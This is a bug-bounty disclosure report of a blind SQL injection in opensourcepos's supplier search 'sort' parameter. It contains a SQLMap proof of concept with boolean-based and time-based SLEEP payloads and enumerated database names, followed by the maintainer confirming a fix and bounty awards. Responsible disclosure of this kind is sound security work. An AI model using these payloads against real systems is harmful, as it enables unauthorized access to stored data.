SQL Injection in opensourcepos/opensourcepos

Valid

Reported on

Aug 26th 2021


✍️ Description

The Application is vulnerable to blind SQL Injection

🕵️‍♂️ Proof of Concept

URL: https://dev.opensourcepos.org/suppliers/search?sort=1 Vulnerable Parameter: sort

SQLMap POC

---
Parameter: sort (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: sort=(SELECT (CASE WHEN (5937=5937) THEN 1 ELSE (SELECT 4996 UNION SELECT 4231) END))

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: sort=1 AND (SELECT 3335 FROM (SELECT(SLEEP(5)))uafX)
---
available databases [2]:
[*] information_schema
[*] ospos

💥 Impact

SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands. A successful SQL injection attack can result in unauthorized access to sensitive data, such as (hashed) passwords, credit card details, or personal user information. 📍 Location index.php#L1 📝 References SQL Injection

Occurences

References

Melbin Mathew Antony modified their report
3 months ago
Ziding Zhang
3 months ago

Admin


Hey Melbin, I've just emailed the repo maintainer about this report.

We have contacted a member of the opensourcepos team and are waiting to hear back 3 months ago
We have contacted a member of the opensourcepos team and are waiting to hear back 3 months ago
jekkos
3 months ago

Maintainer


Fix is in master

jekkos
3 months ago

Maintainer


Thanks for the report.

Melbin
3 months ago

Researcher


Hi, Please mark the issue as validated and fixed. Thanks.

jekkos validated this vulnerability 3 months ago
Melbin Mathew Antony has been awarded the disclosure bounty
The fix bounty is now up for grabs
jekkos confirmed that a fix has been merged on b4c48e 3 months ago
jekkos has been awarded the fix bounty